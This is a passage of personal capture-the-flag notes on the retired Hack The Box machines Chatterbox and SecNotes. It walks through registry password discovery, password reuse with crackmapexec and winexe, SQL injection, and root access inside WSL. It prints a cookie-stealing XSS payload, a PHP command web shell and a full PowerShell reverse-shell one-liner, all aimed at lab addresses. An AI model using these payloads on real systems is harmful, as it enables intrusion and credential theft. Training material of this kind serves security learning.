                           [126]: KB3060716
                           [127]: KB3061518
                           [128]: KB3067903
                           [129]: KB3068708
                           [130]: KB3071756
                           [131]: KB3072305
                           [132]: KB3074543
                           [133]: KB3075226
                           [134]: KB3078601
                           [135]: KB3078667
                           [136]: KB3080149
                           [137]: KB3084135
                           [138]: KB3086255
                           [139]: KB3092627
                           [140]: KB3093513
                           [141]: KB3097989
                           [142]: KB3101722
                           [143]: KB3102429
                           [144]: KB3107998
                           [145]: KB3108371
                           [146]: KB3108381
                           [147]: KB3108664
                           [148]: KB3109103
                           [149]: KB3109560
                           [150]: KB3110329
                           [151]: KB3118401
                           [152]: KB3122648
                           [153]: KB3123479
                           [154]: KB3126587
                           [155]: KB3127220
                           [156]: KB3133977
                           [157]: KB3137061
                           [158]: KB3138378
                           [159]: KB3138612
                           [160]: KB3138910
                           [161]: KB3139398
                           [162]: KB3139914
                           [163]: KB3140245
                           [164]: KB3147071
                           [165]: KB3150220
                           [166]: KB3150513
                           [167]: KB3156016
                           [168]: KB3156019
                           [169]: KB3159398
                           [170]: KB3161102
                           [171]: KB3161949
                           [172]: KB3161958
                           [173]: KB3172605
                           [174]: KB3177467
                           [175]: KB3179573
                           [176]: KB3184143
                           [177]: KB3185319
                           [178]: KB4014596
                           [179]: KB4019990
                           [180]: KB4040980
                           [181]: KB976902
                           [182]: KB982018
                           [183]: KB4054518
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection 4
                                 DHCP Enabled:    No
                                 IP address(es)
```

Launching the exploit suggester:

```bash
┌──(aml㉿kali)-[~/HTB/Retired/Devel]
└─$ python windows-exploit-suggester.py -i Windows-Exploit-Suggester/systeminfo.txt -d 2022-11-14-mssb.xls
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 183 hotfix(es) against the 381 potential bulletins(s) with a database of 137 known exploits
[*] there are now 175 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 SP1 32-bit'
[*] 
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*] 
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*] 
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*] 
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*] 
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*]   https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 JavaScriptStackWalker Memory Corruption (MS15-056)
[*]   http://blog.skylined.nl/20161206001.html -- MSIE jscript9 JavaScriptStackWalker memory corruption
[*] 
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*]   https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*]   https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*] 
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*]   Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
[*] 
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*]   https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*]   https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*] 
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*] 
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[*]   http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC
[*]   http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*]   https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*]   https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*] 
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]   http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*] 
[*] done
```

Checking what is listening locally (the reverse shell, 49158 to 10.10.14.3:8877, belongs to PID 788, the same process that owns the AChat ports 9255/9256; and 445 is bound on all interfaces, which is what lets crackmapexec and winexe in later):

```bash
C:\Windows\system32>netstat -ano
netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       352
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       456
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       968
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING       464
  TCP    10.10.10.74:139        0.0.0.0:0              LISTENING       4
  TCP    10.10.10.74:9255       0.0.0.0:0              LISTENING       788
  TCP    10.10.10.74:9256       0.0.0.0:0              LISTENING       788
  TCP    10.10.10.74:49158      10.10.14.3:8877        ESTABLISHED     788
  TCP    [::]:135               [::]:0                 LISTENING       664
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       352
  TCP    [::]:49153             [::]:0                 LISTENING       716
  TCP    [::]:49154             [::]:0                 LISTENING       912
  TCP    [::]:49155             [::]:0                 LISTENING       456
  TCP    [::]:49156             [::]:0                 LISTENING       968
  TCP    [::]:49157             [::]:0                 LISTENING       464
  UDP    0.0.0.0:123            *:*                                    872
  UDP    0.0.0.0:500            *:*                                    912
  UDP    0.0.0.0:4500           *:*                                    912
  UDP    0.0.0.0:5355           *:*                                    1104
  UDP    0.0.0.0:57992          *:*                                    1104
  UDP    0.0.0.0:58405          *:*                                    1104
  UDP    10.10.10.74:137        *:*                                    4
  UDP    10.10.10.74:138        *:*                                    4
  UDP    10.10.10.74:1900       *:*                                    3352
  UDP    10.10.10.74:9256       *:*                                    788
  UDP    10.10.10.74:58819      *:*                                    3352
  UDP    127.0.0.1:1900         *:*                                    3352
  UDP    127.0.0.1:58820        *:*                                    3352
  UDP    [::]:123               *:*                                    872
  UDP    [::]:500               *:*                                    912
  UDP    [::]:4500              *:*                                    912
  UDP    [::1]:1900             *:*                                    3352
  UDP    [::1]:58818            *:*                                    3352
```

Hunting for passwords in the registry:

```bash
C:\Users\Alfred\Desktop>reg query HKLM /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
    (Default)    REG_SZ    IAS.ChangePassword.1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\VersionIndependentProgID
    (Default)    REG_SZ    IAS.ChangePassword

[...]

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Welcome1!

[...]

End of search: 49 match(es) found.
```

Looks like a password, doesn't it?
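`reg query /f password` matches the word anywhere, including in data such as `IAS.ChangePassword.1`, so most of those 49 hits are noise. The parser below is an added example (not from this note): it reads `reg query /s` output, keeps only values whose name looks like a credential, and checks the Winlogon auto-logon triple (`AutoAdminLogon`, `DefaultUserName`, `DefaultPassword`), which is what turns a string match into a usable credential. `SAMPLE` is constructed from the hits shown above.

```python
"""Parse `reg query ... /s` output and keep only credential-looking values.
Added example, not from the original note. `/f password` matches the string
anywhere, so data such as IAS.ChangePassword.1 shows up too; filtering on the
value *name* and checking the Winlogon auto-logon triple is what separates
noise from a usable credential. SAMPLE is constructed from the hits above."""
import re

KEY_RE = re.compile(r"^HKEY_[A-Z_]+\\")
VALUE_RE = re.compile(r"^\s{2,}(\S+)\s+(REG_[A-Z_]+)\s*(.*)$")
CRED_NAME_RE = re.compile(r"pass|pwd|cred|secret|token", re.I)

WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Constructed sample, shaped like the `reg query` output in this section.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
    (Default)    REG_SZ    IAS.ChangePassword.1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Shell    REG_SZ    explorer.exe
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    Welcome1!

End of search: 2 match(es) found.
"""


def parse_reg_query(text):
    """Yield (key_path, value_name, value_type, data) for each value line.
    Key paths stand alone at column 0; values are indented under them."""
    key = None
    for line in text.splitlines():
        if KEY_RE.match(line):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield key, m.group(1), m.group(2), m.group(3).strip()


def find_credentials(text):
    """Values whose *name* looks like a credential and that hold a string.
    (Default) values matched only on their data are dropped here."""
    return [(key, name, data)
            for key, name, vtype, data in parse_reg_query(text)
            if CRED_NAME_RE.search(name) and data
            and vtype in ("REG_SZ", "REG_EXPAND_SZ")]


def autologon(text):
    """(domain, user, password) if Winlogon auto-logon is on, else None.
    A DefaultPassword alone is a hint; AutoAdminLogon=1 makes it the
    password the box logs in with at boot."""
    vals = {name: data for key, name, _, data in parse_reg_query(text)
            if key.upper() == WINLOGON.upper()}
    if vals.get("AutoAdminLogon") != "1" or not vals.get("DefaultPassword"):
        return None
    return (vals.get("DefaultDomainName", ""),
            vals.get("DefaultUserName", ""),
            vals["DefaultPassword"])


if __name__ == "__main__":
    print("credential values:", find_credentials(SAMPLE))
    print("auto-logon:", autologon(SAMPLE))
```

Run against a real `reg query HKLM /s` dump piped from the target, the interesting output is the short list `find_credentials` returns plus the auto-logon triple, rather than the 49 lines the `/f` search prints.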
```bash
C:\Users\Alfred\Desktop>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    ShutdownWithoutLogon    REG_SZ    0
    WinStationsDisabled    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    scremoveoption    REG_SZ    0
    ShutdownFlags    REG_DWORD    0x11
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
```

`AutoAdminLogon` is `1` and `DefaultUserName` is `Alfred`, so this is the plaintext auto-logon password for Alfred. And it does work:

```bash
┌──(aml㉿kali)-[~/HTB/Retired/chatterbox]
└─$ smbclient --user=alfred -L 10.10.10.74
Password for [WORKGROUP\alfred]:        <- the correct one

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.74 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(aml㉿kali)-[~/HTB/Retired/chatterbox]
└─$ smbclient --user=alfred -L 10.10.10.74
Password for [WORKGROUP\alfred]:        <- a wrong one
session setup failed: NT_STATUS_LOGON_FAILURE
```

And the same password works for "Administrator" (password reuse between the auto-logon user and the local admin):

```bash
┌──(aml㉿kali)-[~/HTB/Retired/chatterbox]
└─$ smbclient --user=Administrator -L 10.10.10.74
Password for [WORKGROUP\Administrator]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.74 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

Crackmapexec lets us run commands once we have the credentials, thanks to port 445 :)

```bash
┌──(aml㉿kali)-[/usr/share/windows-resources/binaries]
└─$ crackmapexec smb 10.10.10.74 -u Administrator -p "Welcome1\!" -x "type C:\Users\Administrator\Desktop\root.txt"
SMB         10.10.10.74     445    CHATTERBOX       [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB         10.10.10.74     445    CHATTERBOX       [+] Chatterbox\Administrator:Welcome1! (Pwn3d!)
SMB         10.10.10.74     445    CHATTERBOX       [+] Executed command 
SMB         10.10.10.74     445    CHATTERBOX       f9eb4383d7c349fbad346894bb620e8d
```

Another way is with winexe:

```bash
┌──(aml㉿kali)-[/usr/share/windows-resources/binaries]
└─$ winexe -U Administrator%Welcome1! //10.10.10.74 "cmd.exe"
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32>whoami
whoami
chatterbox\administrator
```

## Windows Subsystem Linux (WSL)- SecNotes

### Access to the machine

nmap:

```bash
┌──(aml㉿kali)-[~/HTB/Retired/SecNotes]
└─$ sudo nmap -T5 -A -p80,445,8808 10.10.10.97
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-14 21:48 CET
Nmap scan report for 10.10.10.97
Host is up (0.070s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp  open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
| http-methods:
|_  Potentially risky methods: TRACE
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h40m01s, deviation: 4h37m09s, median: 0s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-11-14T20:49:13
|_  start_date: N/A
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2022-11-14T12:49:14-08:00

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   75.95 ms 10.10.14.1
2   77.70 ms 10.10.10.97

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.38 seconds
```

There's a website with a login form on port 80. After registering, there's a "notepad" where you can save notes. We also have a username, tyler@secnotes.htb, and we can send him a message through the contact form.

First note created: it allows HTML code. Second note created: stored XSS. Third note: "alert(document.cookie)" works. So our payload will be:

```javascript
<script>var i=new Image;i.src="http://10.10.14.3/?"+document.cookie;</script>
```

Sent the XSS but got no callback... The session id doesn't change after logout.

OK, the rabbit hole was in the register form. If we register with the username **' or '1'='1**, then on the next login we see every user's notes.
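The reason a username of `' or '1'='1` returns every user's notes is that the application pastes the stored username into the SQL text that lists notes. The following added example (my own code, not from the course or the SecNotes box) reproduces that query against an in-memory SQLite database with constructed sample rows, then shows the parameterised form that treats the quotes as data. Table and column names are assumptions for the illustration.

```python
"""Added example: string-built note query vs. the parameterised fix.

Constructed sample data; the injected username is the one registered above.
"""
import sqlite3

INJECTED_USERNAME = "' or '1'='1"   # the value the notes above were registered with


def make_db():
    """Constructed sample data: three users, one note each (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE notes (id INTEGER PRIMARY KEY, username TEXT, title TEXT);
        INSERT INTO notes (username, title) VALUES
            ('tyler', 'new site'),
            ('alice', 'groceries'),
            ('bob',   'todo');
    """)
    return conn


def notes_vulnerable(conn, username):
    """String-built query: the username goes straight into the SQL text, so the
    WHERE clause becomes  username = '' or '1'='1'  and matches every row."""
    sql = "SELECT title FROM notes WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def notes_safe(conn, username):
    """Parameterised query: the driver binds the value, so the quotes inside the
    username are compared literally and no row matches."""
    sql = "SELECT title FROM notes WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", notes_vulnerable(db, INJECTED_USERNAME))   # all three titles
    print("safe:      ", notes_safe(db, INJECTED_USERNAME))         # []
    print("safe/tyler:", notes_safe(db, "tyler"))                   # ['new site']
```

The same binding rule applies to the registration and login statements; the injection only has to survive one string-built query anywhere in the session flow.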
Among those notes there is one called "new site":

```
\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&
```

And:

```bash
┌──(aml㉿kali)-[~/HTB/Retired/SecNotes]
└─$ rpcclient -U "Tyler" secnotes.htb
Password for [WORKGROUP\Tyler]:
rpcclient $> getusername
Account Name: tyler, Authority Name: SECNOTES
rpcclient $>
```

```bash
┌──(aml㉿kali)-[~/HTB/Retired/SecNotes]
└─$ smbmap -R -u Tyler -p "92g\!mA8BGjOirkL%OG*&" -H 10.10.10.97
[+] IP: 10.10.10.97:445	Name: secnotes.htb
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	.\IPC$\*
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	InitShutdown
	fr--r--r--                4 Sun Dec 31 23:45:16 1600	lsass
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	ntsvcs
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	scerpc
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-374-0
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	epmapper
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-1f0-0
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	LSM_API_service
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	eventlog
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-424-0
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	atsvc
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-54c-0
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	spoolss
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-6a8-0
	fr--r--r--                4 Sun Dec 31 23:45:16 1600	wkssvc
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	trkwks
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	mysqld2584_pipe
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	tapsrv
	fr--r--r--                4 Sun Dec 31 23:45:16 1600	srvsvc
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	vgauth-service
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-278-0
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	ROUTER
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	Winsock2\CatalogChangeListener-280-0
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	browser
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	MsFteWds
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	SearchTextHarvester
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	PSHost.133129316245153885.4788.DefaultAppDomain.powershell
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	PSHost.133129316238238397.508.DefaultAppDomain.powershell
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	iisipmb2a07fbb-a3d2-408f-98ab-15d046feb474
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	iislogpipe6836445c-e406-4875-895b-f9edadb20a45
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
	fr--r--r--                3 Sun Dec 31 23:45:16 1600	W32TIME_ALT
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	iisipm6f1c5db5-e853-47af-9a3f-61f2d4809197
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	iislogpipe3ff7e51a-b23f-4228-be97-0cf8c2aa25af
	fr--r--r--                1 Sun Dec 31 23:45:16 1600	IISFCGI-c80d09e6-0aeb-4373-a643-4d82ab00a636
	new-site                                          	READ, WRITE
	.\new-site\*
	dr--r--r--                0 Tue Nov 15 09:25:13 2022	.
	dr--r--r--                0 Tue Nov 15 09:25:13 2022	..
	fr--r--r--              696 Thu Jun 21 22:15:36 2018	iisstart.htm
	fr--r--r--            98757 Thu Jun 21 22:15:38 2018	iisstart.png
```

Uploaded revshell.php:

```php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
```

```bash
┌──(aml㉿kali)-[~/HTB/Retired/SecNotes]
└─$ smbclient -U Tyler //10.10.10.97/new-site
Password for [WORKGROUP\Tyler]:
Try "help" to get a list of possible commands.
smb: \> list
0: server=10.10.10.97, share=new-site
smb: \> ls
  .                                   D        0  Tue Nov 15 09:25:13 2022
  ..                                  D        0  Tue Nov 15 09:25:13 2022
  iisstart.htm                        A      696  Thu Jun 21 17:26:03 2018
  iisstart.png                        A    98757  Thu Jun 21 17:26:03 2018

		7736063 blocks of size 4096. 3388138 blocks available
smb: \> put revshell.php
putting file revshell.php as \revshell.php (24,2 kb/s) (average 24,2 kb/s)
smb: \>
```

Sent this payload through the PHP page to get a proper reverse shell on port 8888:

```cmd
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.4',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

And:

```bash
┌──(aml㉿kali)-[~/HTB/Retired/SecNotes]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.97] 57887
PS C:\inetpub\new-site> whoami
secnotes\tyler
```

```bash
C:\inetpub\new-site>sc query windefend
sc query windefend

SERVICE_NAME: windefend
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
```

```bash
C:\inetpub\new-site>where /R c:\windows bash.exe
where /R c:\windows bash.exe
c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe

C:\inetpub\new-site>where /R c:\windows wsl.exe
where /R c:\windows wsl.exe
c:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf\wsl.exe
```

Well, what a surprise!
```bash
C:\inetpub\new-site>c:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf\wsl.exe whoami
c:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf\wsl.exe whoami
root
```

We hop into the WSL bash:

```bash
C:\inetpub\new-site>c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
mesg: ttyname failed: Inappropriate ioctl for device
whoami
root
python -c 'import pty;pty.spawn("/bin/bash")'
root@SECNOTES:~# whoami
whoami
root
root@SECNOTES:~# hostname
hostname
SECNOTES
root@SECNOTES:~#
```

Wo!!

```bash
root@SECNOTES:~# history
history
    1  cd /mnt/c/
    2  ls
    3  cd Users/
    4  cd /
    5  cd ~
    6  ls
    7  pwd
    8  mkdir filesystem
    9  mount //127.0.0.1/c$ filesystem/
   10  sudo apt install cifs-utils
   11  mount //127.0.0.1/c$ filesystem/
   12  mount //127.0.0.1/c$ filesystem/ -o user=administrator
